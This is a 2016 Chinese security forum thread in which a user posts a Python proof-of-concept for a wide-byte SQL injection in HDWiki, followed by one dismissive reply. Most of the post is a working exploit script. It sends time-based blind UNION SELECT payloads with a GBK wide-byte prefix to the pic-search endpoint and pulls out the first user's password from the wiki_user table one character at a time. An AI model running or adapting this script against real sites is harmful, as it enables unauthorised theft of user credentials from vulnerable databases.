查看: 14545|回复: 1

hdwiki最新版宽字节注入验证脚本

[复制链接]
  • TA的每日心情
    郁闷
    2019-12-19 16:52
  • 签到天数: 157 天

    [LV.7]常住居民III

    发表于 2016-6-1 20:13:03 | 显示全部楼层 |阅读模式
    本帖最后由 blackfish 于 2016-6-1 20:23 编辑

    漏洞来源:http://0day5.com/archives/3351
    [AppleScript] 纯文本查看 复制代码
    import requests
    
    import time
    
    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    
    name = ""
    
    for i in range(1,32):
    
        for p in payloads:
    
            s1 = "%s" %(i)
    
            s2 = "%s" %(ord(p))
    
            
    
            start_time = time.time()
    
            try:
    
                
    
                payload = {'searchtext':"鐩搁對' UNION SELECT if(ORD(mid((select password from wiki_user limit 0,1),"+s1+",1))="+s2+",sleep(3),0)#"}
    
                
    
                r = requests.post("http://localhost/hdwiki/index.php?pic-search", data=payload,timeout=30)
    
                if time.time() - start_time > 3.0:
    
                    name = name+p
    
                    print name+'.....'
    
            except requests.RequestException as e:
    
                
    
                break
    
            
    
    print '\n[Done]MySQL user is ' + name

    QQ图片20160531214556.jpg
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-8-22 16:10
  • 签到天数: 93 天

    [LV.6]常住居民II

    发表于 2016-6-1 22:17:16 | 显示全部楼层
    这特么去年的你
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-21 23:37 , Processed in 0.037256 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部